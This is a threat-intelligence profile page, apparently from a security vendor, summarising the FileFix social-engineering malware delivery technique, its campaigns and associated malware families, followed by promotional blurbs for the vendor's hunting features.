FileFix
FileFix is a social-engineering malware delivery technique and a named variant of ClickFix that abuses trusted Windows interfaces to trick users into manually executing attacker-supplied commands. First revealed by security researcher mr.d0x in June 2025, FileFix shifts execution from the Windows Run dialog to the Windows File Explorer address bar, making the activity stealthier and helping it avoid some standard security alerts. Like ClickFix, it commonly relies on fake verification, error, or CAPTCHA-style prompts and can use JavaScript clipboard APIs to place malicious commands for the victim to paste and run.
The technique has been used to deliver multiple malware families, including Interlock RAT and StealC v2 infostealer; broader ClickFix/FileFix activity has also been associated with delivery of infostealers, loaders, RATs, and rootkits. Reported delivery vectors for the broader technique include spearphishing, malvertising, SEO poisoning, compromised websites, and social media content. One FileFix campaign attributed to the KongTuke threat cluster distributed Interlock RAT via compromised websites and fake CAPTCHA prompts. Another FileFix campaign impersonated Facebook security alerts and used AI-generated images with embedded PowerShell scripts to deliver StealC v2. A later in-the-wild FileFix campaign was reported to use steganography.
FileFix is associated with the broader commercialization and operational adoption of ClickFix-style tradecraft by both cybercriminal and state-aligned actors. The surrounding reporting states that ClickFix/FileFix activity has targeted sectors including technology, financial services, manufacturing, retail, government, and energy, and that related ClickFix operations have been linked to groups such as APT28 and MuddyWater. High-confidence behavioral characteristics from the related technique include user-initiated execution of obfuscated commands via trusted Windows tools, frequent use of PowerShell and other LOLBins, and follow-on malware execution after the pasted command runs.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Recent activity
3 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A named relative of ClickFix that uses other trusted Windows tools as part of the same broader social-engineering execution pattern.
FileFix is an evolution of ClickFix that prompts users to paste malicious commands into the Windows File Explorer address bar, resulting in the execution of attacker-controlled code. It is stealthier than ClickFix, harder to detect, and is used to deliver malware such as RATs and infostealers.
FileFix is a malware campaign leveraging steganography to conceal malicious payloads, moving beyond proof-of-concept to active exploitation.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.